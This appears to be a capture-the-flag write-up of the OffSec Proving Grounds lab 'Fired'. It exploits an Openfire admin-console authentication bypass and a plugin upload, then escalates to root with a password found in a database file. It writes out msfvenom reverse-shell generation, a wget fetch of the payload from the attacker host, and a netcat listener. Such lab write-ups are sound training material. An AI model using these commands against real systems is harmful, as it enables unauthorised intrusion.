As always in every penetration testing engagements we start by reconnaissance and information gathering, in this step we try to get as much information about the target as possible.

We can achieve that by using various of tools and techniques to obtain foothold on the target, by using enumeration, scanning and other recon techniques.

In this lab we are tasked to pentest this Linux Lab : Fired on Offsec’s Proving grounds :

First step will be to check if the target is up and running, we could do so by sending ICMP requests to check if we can communicate with the target:

ping 192.168.238.96

Next I’ll run an initial scan with nmap to scan for open ports and services:

nmap -T4 -F 192.168.238.96

I can see that there is port 22 running SSH open, lets run a full nmap scan to make sure we are not missing anything…

nmap -sC -sV -p- 192.168.238.96 -oA full -v

Other than SSH I found two open ports :

Port 9091 and Port 9090.

Port 9091 seems like an empty webpage, but 9090 is running a CMS called : openfire [ Version: 4.7.3 ] lets try to search about this version and see if we can exploit it.

After searching the CMS service and the version number I found the following vulnerability that affects the target:

The vulnerability lies within the web-based Admin Console, permitting a path traversal attack through the setup environment. This flaw allows unauthenticated users to access restricted pages intended only for administrative users within an already configured Openfire environment.

While Openfire had path traversal protections, it failed to defend against certain non-standard URL encoding for UTF-16 characters, not supported by the embedded webserver in use at that time. The subsequent upgrade of the embedded webserver introduced support for this non-standard encoding, which the existing path traversal protections did not cover.

Moreover, Openfire’s API allowed exclusion of certain URLs from web authentication using wildcard patterns, such as the login page. This combination of wildcard pattern matching and the path traversal vulnerability enabled malicious users to bypass authentication requirements for Admin Console pages.

This vulnerability impacts all Openfire versions released after April 2015, commencing from version 3.10.0. The issue has been patched in releases 4.7.5 and 4.6.8. Further enhancements are slated for the forthcoming version on the 4.8 branch (expected as version 4.8.0).

The Exploit was able to generate for me a Username and password that I could use to login →

Another exploit was found that can help us follow up on the next steps :

The second step is that we are supposed to upload a jar file into the management portal:

After uploading the jar plugin file, I was able to login to the management tool from Server Settings → Management tool.

From there I can swap to System command from the upper right corner:

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.45.240 LPORT=9001 -f raw > reverse.sh

Host my kali with a python command with port 8000

python -m http.server 8000

Next steps would be and since we can execute system commands on the target web server, I’ll transfer the file into the server with the following command;

wget http://192.168.45.240:8000/reverse.sh -O /tmp/reverse.sh

And then mark it executable :

chmod +x reverse.sh

After I do that I’ll run a listener on port 9001:

nc -lnvp 9001

And execute the revshell :

/bin/bash /tmp/reverse.sh

After getting the user flag it’s time to escalate our priviliges and get root, I ran linpeas as usual for privilege escalation and found two writable files :

SELinux support: yes
Writable: /var/log/openfire/openfire.log
Writable: /var/lib/openfire/embedded-db/openfire.log

I’ll investigate them next.

In the /var/lib/openfire/embedded-db directory I examined the logs and the files and found interesting information:

I was able to run the following command on :
cat openfire.script | grep “password”

And got the following credential :

From the values we can see that it’s metnioning mail.smtp.password, however there was no SMTP service running so I tried the password to authenticate as root and it works !

And here we I can conclude the write-up successfully, if you like what you read, please support me by sharing this article with others, and clap as much as you can, its really appreciated and helps me as a writer to say motivated and continuously bringing you more content!

Thanks & Cheers!

Happy hacking!